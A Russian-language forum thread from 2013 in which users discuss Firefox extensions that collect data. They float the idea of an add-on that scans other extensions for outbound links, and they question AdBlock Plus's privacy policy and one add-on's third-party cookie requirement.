Почему-то мне кажется они их будут терпеть ровно до тех пор, пока эта чушь выключено по-умолчанию. Если сбор данных будет выключен по-умолчанию, то и проблемы нет.

Меня вот другое удивляет — я не обнаружил кода, который бы проверял наличие аналогичного фрейма от другого расширения. Интересно что будет если поставить всех их расширения сразу и включить отображение фрейма?

А теоретически можно сделать такое расширение, которое проверяет код всех установленных расширений на наличие ссылок на сайты (то есть всех, ссылку в AdBlock Plus на страницу обновлений, ссылку Ghostery, ссылку Copy Link Name и так далее)? Так, чтобы выводился список всех таких ссылок, напротив них checkbox'ы и при снятии галочки ссылка заменяется на 127.0.0.1?
Я так понимаю, такое дополнение должно еще проверять код на наличие функций сложения строк и вызова функций работы с сетью. Если совсем по хорошему, то оно должно все регулярные выражения преобразовывать в читаемый вид, или хотя бы выводить предупреждение с именем файла в котором такое обнаружено.

Ну или кнопку сканирующую все файлы расширений в профиле?

01-09-2013 17:14:29
В AdBlock Plus политика приватности тоже не переведена.

lilololilt

Недопереведена: adblockplus.org/ru/privacy
В том числе плохая моя работа. Вот гуглперевод конца:

А вот,  это расширение шпионит за пользователями ? https://addons.mozilla.org/ru/firefox/a … rg-addons/

amin01
Видимо нет, скорее всего политика по умолчанию это запрещает. Только не понятно зачем они там с куками так намудрили, но это из-за криворукости.

А что там нетак с куками?

amin01
Там же в описании написано, расширение требует отправки 3-е сторонних куков, добавление в исключения. Судя по тому, что могут делать некоторые дополнения это не обязательно и можно было реализовать без этого.

13-09-2013 14:47:42
Я бы на всякий случай не рекомендовал это расширение.

13-09-2013 14:51:03
Вроде там только о 3 речь, если будет работать без вкючения 3-е сторонних куков на 17 +, то все в порядке.